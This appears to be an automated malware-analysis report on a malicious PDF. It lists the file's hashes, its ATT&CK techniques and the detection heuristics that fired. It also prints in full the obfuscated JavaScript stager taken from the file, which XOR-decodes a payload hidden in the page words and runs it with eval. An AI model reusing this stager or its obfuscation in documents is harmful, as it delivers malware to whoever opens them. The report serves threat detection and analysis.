Malicious PDF — malware analysis report

Static analysis result for SHA-256 82cdaaacf5725c34…

MALICIOUS

PDF

Size: 4.5 KB
Authoring application: Vabameuaki
First seen: 2026-05-10

MD5: 8d7aebd66a47ca4cd5a454d7d2d49ca4
SHA-1: 3331bd40804bcf5f027cf13e70e23ed3097b9d7d
SHA-256: 82cdaaacf5725c344ba25c8ac1cdc381a0ac5b1e1c60d56e035e5a7fd2fe2232

Risk Score: 86

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1566.001 Spearphishing Attachment

The PDF contains obfuscated JavaScript that uses string concatenation and XOR operations to construct and execute a payload. The script appears to be a stager designed to download and execute a second-stage malicious file from a remote location. The ML classifier and heuristic firings strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier: malicious score 1.0000

Heuristics (3)

  • Page-word XOR JavaScript eval stager (severity: high; rule: PDF_PAGE_WORD_XOR_EVAL_STAGER)
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action (severity: low; 1 related finding; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0011_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 11 at offset 0xCA2
Size: 815 bytes
SHA-256: 1ec398366107a5fedd9bcf18a57f32d68d58e87986c8ad1c876f457b209e2152

Preview script (first 1,000 lines of the extracted script):
var qX=String("getPa"+"geNth1OA8".substr(0,5)+"IsbWord".substr(3));function t(h,j){return h^j;};var jS=this;;var aR=new String("from"+"G0DChar".substr(3)+"CodeWqM2".substr(0,4));var p=String;var f=new String();var pY="unes"+"cape";var cV="subs"+"trDbgy".substr(0,2);var jSX=1;var n=91;var hS="getPa"+"YTRgeNum".substr(3)+"hOXWords".substr(3);var cX=String("char"+"Code1jzi".substr(0,4)+"At52Ml".substr(0,2));var nM=["p","","p","a"];oX=new String(nM[3]+nM[0]+nM[0]+nM[1]);var nO=["l","e","v","","a"];sX=new String(nO[1]+nO[2]+nO[4]+nO[0]+nO[3]);var l=4618-4618;;var z=new String("U9j%".substr(3));var v=73-71;var x=jS[sX];var hC=jS[hS](jSX);var oX=jS[oX];;var oR=jS[pY];for(var d=l;d<hC;d++){jW=jS[qX](jSX,d);var uN=jW[cV](jW.length-v,v);var nC=z+uN;var mT=oR(nC);var hI=mT[cX](l);var cD=t(hI,n);f+=p[aR](cD);}x(f);